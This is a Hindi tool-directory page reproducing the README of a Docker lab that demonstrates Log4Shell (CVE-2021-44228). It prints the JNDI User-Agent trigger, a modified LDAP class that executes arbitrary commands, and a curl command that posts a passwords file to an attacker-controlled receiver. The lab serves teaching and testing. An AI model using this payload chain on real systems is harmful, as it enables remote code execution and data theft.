Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-docker-example — CVE-2021-44228 (Log4Shell) शोषण का डॉकर-आधारित प्रदर्शन, जिसमें एक कमजोर जावा सर्वर, दुर्भावनापूर्ण LDAP सर्वर, और एक हमलावर-नियंत्रित रिसीवर को डेटा एक्सफिल्ट्रेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/dicanio/cve-2021-44228-docker-example
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनलर्निंग और शिक्षालैब और अभ्यास
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

CVE-2021-44228 (Log4Shell) शोषण का डॉकर-आधारित प्रदर्शन, जिसमें एक कमजोर जावा सर्वर, दुर्भावनापूर्ण LDAP सर्वर, और एक हमलावर-नियंत्रित रिसीवर को डेटा एक्सफिल्ट्रेशन शामिल है।

रिपॉजिटरी देखें
144 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228-docker-example

CVE-2021-44228 का एक सरल प्रदर्शन जो एक असुरक्षित सर्वर से एक हमलावर द्वारा नियंत्रित वेब सेवा में डेटा स्थानांतरित करता है। सभी घटक Docker के माध्यम से चल रहे हैं।

घटक

vulnerable-server

यह एक मानक Java सर्वर है जो पीड़ित के रूप में कार्य करता है। इसमें चल रहे हैं:

  • Java 8u111
  • वेब एप्लीकेशन (Spring Boot 2.6.1)
  • Log4J

यह सर्वर इस कॉन्फ़िगरेशन का उपयोग करके VULNERABLE है।

अतिरिक्त जानकारी:

  • /logging पर एंडपॉइंट (GET) Log4J का उपयोग करके user agent को लॉग करेगा
  • /foo/passwords.txt मौजूद है (हमलावर का लक्ष्य)

passwords.txt की सामग्री:

root@kitploit:~
my secret

malicious-receiver

यह एक मानक Java सर्वर है जो हमलावर के डेटा संग्रहकर्ता के रूप में कार्य करता है। इसमें चल रहे हैं:

  • Java 17
  • वेब एप्लीकेशन (Spring Boot 2.6.1)

अतिरिक्त जानकारी:

  • receiver पर एंडपॉइंट (POST) अनुरोध निकाय को लॉग करेगा

malicious-ldap

यह rogue-jndi द्वारा संचालित एक LDAP सर्वर है। इसकी ExportJava क्लास को संशोधित किया गया है ताकि -c फ्लैग के माध्यम से पारित कमांड निष्पादित हो सकें।

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

जब असुरक्षित सर्वर द्वारा अनुरोध किया जाता है, तो यह एक क्लास के साथ प्रतिक्रिया देगा जो इंस्टेंशिएट होने पर निम्नलिखित कमांड चलाता है:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

यह प्रभावी रूप से /foo/passwords.txt की सामग्री को malicious receiver के तैयार एंडपॉइंट पर पोस्ट करेगा।

उपयोग

  1. Docker इमेज सेटअप करने के लिए चलाएँ:
    root@kitploit:~
    ./build.sh
    
  2. कंटेनर शुरू करने के लिए चलाएँ:
    root@kitploit:~
    ./start.sh
    
  3. भेद्यता को ट्रिगर करने के लिए चलाएँ:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. malicious receiver घटक के लॉगिंग आउटपुट की जाँच करने के लिए चलाएँ:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    वहाँ सर्वर की passwords.txt फ़ाइल की सामग्री होनी चाहिए।
  5. कंटेनर रोकने के लिए चलाएँ:
    root@kitploit:~
    ./stop.sh
    
टूल डाउनलोड करें